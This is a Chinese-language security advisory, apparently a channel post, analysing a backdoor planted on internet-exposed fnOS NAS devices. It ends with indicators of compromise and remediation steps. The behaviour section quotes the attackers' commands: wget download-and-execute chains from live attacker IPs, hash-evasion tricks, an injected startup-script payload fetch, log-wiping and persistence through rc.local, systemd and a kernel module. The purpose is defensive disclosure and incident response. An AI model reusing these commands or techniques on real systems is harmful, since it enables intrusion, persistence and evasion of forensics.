Post #4747

重要/漏洞：飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件 漏洞编号：暂无（官方未公开 / 未分配 CVE） 重要等级：严重（高危） CVSS 分数：暂无 影响范围： fnOS 设备存在公网可达入口（端口映射/反代/直连公网）时风险显著上升；官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。 论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象，说明风险不应仅限定为 HTTP 明文通道（可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发） 受影响系统： fnOS（版本范围未公开）。官方社区回复称该问题官方已知，建议升级至 1.1.15，并在关闭公网端口映射后验证异常上传/连接是否停止。 木马行为分析 目前LoopDNS频道编辑已获取相关木马文件，下为行为分析 1. 入侵者在通过未公开入口/利用链投放后门下载器后并执行 下载二阶段载荷并执行（观测到的命令链） cd /tmp wget http://20.89.168.131/nginx chmod 777 nginx head -c 16 /dev/urandom >> nginx（向文件追加随机字节，改变哈希，规避基于哈希的检测） ./nginx wget http://20.89.168.131/trim_https_cgi chmod 777 trim_https_cgi head -c 16 /dev/urandom >> trim_https_cgi ./trim_https_cgi 外联与拉取补充组件 HTTP：GET http://151.240.13.91/trim_fnos TCP：连接 45.95.212.102:6608 2.后门驻留组件 gots A1. 写入后门主体与持久化文件 创建/写入：/sbin/gots 创建/写入：/etc/rc.local、/etc/rc.d/rc.local 创建/写入 systemd 服务（变种服务名）： /etc/systemd/system/x86.service /etc/systemd/system/<sha256>.service 执行持久化：systemctl enable <service>.service（含重定向到 /dev/null 的静默执行） 自身复制/改名落地： /usr/bin/x86（样本发生目录重命名/落地） /usr/bin/<sha256>（样本发生目录重命名/落地） A2. C2 通信与探测 DNS：解析 aura.kabot.icu -> 45.95.212.102 TCP：连接 45.95.212.102 多端口（观测到：3489、5098、6608、7489） 论坛样本显示的附加行为（strings/排查结论） 干扰系统工具：重命名/替换 cat（出现 mv /usr/bin/cat /usr/bin/cat2 等字符串，导致“cat 丢失”现象） 结束系统进程：pkill -f 'network_service|resmon_service' 修改持久化入口：改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable 外联：包含 45.95.212.102 字符串并进行访问 3. 组件 trim_https_cgi 清理痕迹 清空多目录日志：/var/log/*、/usr/trim/logs/*、/run/log/journal 等 删除审计日志：/var/log/audit/audit.log 及滚动文件 删除/清理安全相关日志：/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等 干扰业务与恢复功能 结束服务：pkill -f backup_service、pkill -f sysrestore_service 等 二阶段下载执行与启动脚本注入 修改 /usr/trim/bin/system_startup.sh，追加下载执行链： wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp 端口相关痕迹与疑似隐藏监听（来源于论坛排查） 目标系统存在 0.0.0.0:57132 LISTEN，ss/netstat 无 PID，lsof/fuser 无结果 trim_https_cgi 字符串包含 57132，并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑（提示该端口为其链路的一部分） 4.内核模块 snd_pcap（论坛排查） /etc/modules 被追加 snd_pcap 模块文件：/lib/modules/6.12.18-trim/snd_pcap.ko 与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑（疑似内核层隐藏/驻留能力） 关键落地痕迹 不可变属性（immutable，需先 chattr -i 才能删除）： /usr/bin/nginx /usr/sbin/gots /usr/trim/bin/trim_https_cgi /etc/systemd/system/nginx.service /etc/systemd/system/trim_https_cgi.service /etc/rc.local 伪装/复用：/usr/bin/nginx 与 /usr/sbin/gots md5 相同（同一载荷多名称投放） rc.local 自启：/sbin/gots x86 & systemd 自启（示例）：ExecStart=/usr/bin/nginx x86（oneshot + enable） 可疑网络基础设施（IOC） IP：45[.]95[.]212[.]102（C2/多端口连接） IP：151[.]240[.]13[.]91（HTTP 拉取二阶段：/trim_fnos、论坛样本） 域名：aura[.]kabot[.]icu（解析到 45[.]95[.]212[.]102） 下载源：20[.]89[.]168[.]131（HTTP 拉取：/nginx、/trim_https_cgi） 归属信息：45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554 ISIF OU 提供商网段 处置建议 1. 关闭公网端口映射/源站直通。 2. 升级 fnOS 至官方建议版本（1.1.15 或更高）。 3. 出口防火墙封禁：45.95.212.102、151.240.13.91，同时监控连接数与上传是否回落。 4. 轮换所有管理口令/密钥；检查容器、计划任务、数据盘是否存在触发残留（官方提示“重装后仍可能再次触发”）。 参考来源：飞牛社区